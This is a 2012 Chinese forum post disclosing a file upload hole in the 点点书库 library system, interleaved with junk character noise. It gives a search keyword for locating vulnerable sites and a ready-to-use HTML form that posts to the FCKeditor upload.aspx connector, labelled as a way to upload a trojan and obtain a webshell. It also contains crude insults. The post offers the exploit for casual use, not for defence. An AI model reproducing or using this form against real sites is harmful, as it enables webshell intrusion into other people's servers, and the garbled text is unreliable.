主题:图书馆系统任意文件上传漏洞
( v( ^ G% x" I 作者:冰锋刺客$ o, s4 D; \ h% K4 I: a0 F) ~
厂商:点击书(dianjishu.com)! @, ~9 A2 k& k# L- c
日期:2012-6-21
l1 C+ R7 K ^/ u! a! k / G5 D1 b6 _/ \; B
I 概述6 T$ B3 Y4 i! q# D I. c
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell8 i0 H& Y( V( |5 R! I
II 简介
$ |% F4 |' N5 g 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved") K5 ~2 [1 g' V+ H+ P
补充一个漏洞! M9 w% Y8 }3 G; D( t& Q
<form id="frmUpload" enctype="multipart/form-data"
T" l! W) O: g4 |( }- g2 ` action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
1 y. E: K! e2 H2 ^- | <input id="btnUpload" type="submit" value="操翻他">
* |# p2 @2 h& h$ R! L </form>
3 l, B: h: m' Z) D$ F 你们懂的5 l3 G2 z3 c7 E0 z' l
那傻逼提供还需要改包.
) V; @7 ?5 T& \5 u" \- M 自己看了下源代码发现fckeditor
2 h( v: W" {: v* R I 直接秒杀5 g, c9 _' t- m7 h2 U1 m
|
发表于 2012-9-10 21:20:59
收藏
支持
反对